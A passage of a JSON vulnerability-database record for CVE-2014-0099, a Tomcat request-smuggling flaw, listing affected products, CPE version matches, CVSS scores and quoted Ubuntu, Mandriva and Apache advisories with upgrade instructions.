        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip edge gateway hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "aura conferencing standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "jboss enterprise web server el5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "model": "big-ip edge gateway hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.1"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "smartcloud provisioning fixpack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.31"
      },
      {
        "model": "big-ip psm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "67668"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.0:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.4:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.0.39",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.9:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.1:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.7:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.6:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.2:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.7:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.2:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.8:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.2:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.4:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.0:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.52:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The vendor reported this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "67668"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-0099",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-0099",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201405-588",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header. Apache Tomcat is prone to an information-disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information that may lead to further attacks. \nThe following versions are vulnerable:\nApache Tomcat 8.0.0-RC1 to 8.0.3\nApache Tomcat 7.0.0 to 7.0.52\nApache Tomcat 6.0.0 to 6.0.39. ============================================================================\nUbuntu Security Notice USN-2302-1\nJuly 30, 2014\n\ntomcat6, tomcat7 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Tomcat. \n\nSoftware Description:\n- tomcat7: Servlet and JSP engine\n- tomcat6: Servlet and JSP engine\n\nDetails:\n\nDavid Jorm discovered that Tomcat incorrectly handled certain requests\nsubmitted using chunked transfer encoding. (CVE-2014-0075)\n\nIt was discovered that Tomcat did not properly restrict XSLT stylesheets. (CVE-2014-0096)\n\nIt was discovered that Tomcat incorrectly handled certain Content-Length\nheaders. \n(CVE-2014-0099)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n  libtomcat7-java                 7.0.52-1ubuntu0.1\n\nUbuntu 12.04 LTS:\n  libtomcat6-java                 6.0.35-1ubuntu3.5\n\nUbuntu 10.04 LTS:\n  libtomcat6-java                 6.0.24-2ubuntu1.16\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory                         MDVSA-2015:052\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : tomcat\n Date    : March 3, 2015\n Affected: Business Server 1.0\n _______________________________________________________________________\n\n Problem Description:\n\n Updated tomcat packages fix security vulnerabilities:\n \n Apache Tomcat 7.x before 7.0.47, when an HTTP connector or AJP\n connector is used, does not properly handle certain inconsistent HTTP\n request headers, which allows remote attackers to trigger incorrect\n identification of a request\u0026#039;s length and conduct request-smuggling\n attacks via (1) multiple Content-Length headers or (2) a Content-Length\n header and a Transfer-Encoding: chunked header (CVE-2013-4286). \n \n Apache Tomcat 7.x before 7.0.50 processes chunked transfer coding\n without properly handling (1) a large total amount of chunked data or\n (2) whitespace characters in an HTTP header value within a trailer\n field, which allows remote attackers to cause a denial of service by\n streaming data  (CVE-2013-4322). \n \n java/org/apache/catalina/servlets/DefaultServlet.java in the default\n servlet in Apache Tomcat before 6.0.40 and 7.x before 7.0.53 does not\n properly restrict XSLT stylesheets, which allows remote attackers\n to bypass security-manager restrictions and read arbitrary files\n via a crafted web application that provides an XML external entity\n declaration in conjunction with an entity reference, related to an\n XML External Entity (XXE) issue (CVE-2014-0096). \n \n Apache Tomcat before 6.0.40 and 7.x before 7.0.54 does not properly\n constrain the class loader that accesses the XML parser used with\n an XSLT stylesheet, which allows remote attackers to read arbitrary\n files via a crafted web application that provides an XML external\n entity declaration in conjunction with an entity reference, related\n to an XML External Entity (XXE) issue, or read files associated with\n different web applications on a single Tomcat instance via a crafted\n web application (CVE-2014-0119). \n \n In Apache Tomcat 7.x before 7.0.55, it was possible to craft a\n malformed chunk as part of a chunked request that caused Tomcat to\n read part of the request body as a new request (CVE-2014-0227). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4590\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0096\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0099\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0119\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227\n http://advisories.mageia.org/MGASA-2014-0148.html\n http://advisories.mageia.org/MGASA-2014-0268.html\n http://advisories.mageia.org/MGASA-2015-0081.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n dce2bd5077a8e201da2a52717f3ef3a4  mbs1/x86_64/tomcat-7.0.59-1.mbs1.noarch.rpm\n 7908cc5facecb5c65c976cdff41b1d7c  mbs1/x86_64/tomcat-admin-webapps-7.0.59-1.mbs1.noarch.rpm\n 21d8b843398fa256f05b1ad8464b6787  mbs1/x86_64/tomcat-docs-webapp-7.0.59-1.mbs1.noarch.rpm\n 27218eccc1ba454ef1cafea51976475a  mbs1/x86_64/tomcat-el-2.2-api-7.0.59-1.mbs1.noarch.rpm\n cc0f94bb899c3a82ecb1daa0cccd40b9  mbs1/x86_64/tomcat-javadoc-7.0.59-1.mbs1.noarch.rpm\n 60c451802ce55df14445d2a560f544f8  mbs1/x86_64/tomcat-jsp-2.2-api-7.0.59-1.mbs1.noarch.rpm\n d7598284719161790f2617b715dbe444  mbs1/x86_64/tomcat-jsvc-7.0.59-1.mbs1.noarch.rpm\n 90279c92333646b38010bcf54f488e4a  mbs1/x86_64/tomcat-lib-7.0.59-1.mbs1.noarch.rpm\n e8b29b53c91bee0b3ffdd224c6b00038  mbs1/x86_64/tomcat-log4j-7.0.59-1.mbs1.noarch.rpm\n a648279678ad5c804e8f7f9145ec794c  mbs1/x86_64/tomcat-servlet-3.0-api-7.0.59-1.mbs1.noarch.rpm\n f0cb2c5e57edc0c4f7cda66d393165fb  mbs1/x86_64/tomcat-webapps-7.0.59-1.mbs1.noarch.rpm \n cdaa6216b605cc23635cdeb4f77d32f9  mbs1/SRPMS/tomcat-7.0.59-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFU9XSSmqjQ0CJFipgRAorsAKDX0BTWLEiMn3+FR9/Xn58Pw7GIMwCfRAbS\nNzlDtJatpPDeZdZ4nlO1fgg=\n=NWBY\n-----END PGP SIGNATURE-----\n. \n\nMitigation:\nUsers of affected versions should apply one of the following mitigations\n- Upgrade to Apache Tomcat 8.0.5 or later\n  (8.0.4 contains the fix but was not released)\n- Upgrade to Apache Tomcat 7.0.53 or later\n- Upgrade to Apache Tomcat 6.0.41 or later\n  (6.0.40 contains the fix but was not released)\n\nCredit:\nA test case that demonstrated the parsing bug was sent to the Tomcat\nsecurity team but no context was provided. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: Red Hat JBoss Web Server 2.0.1 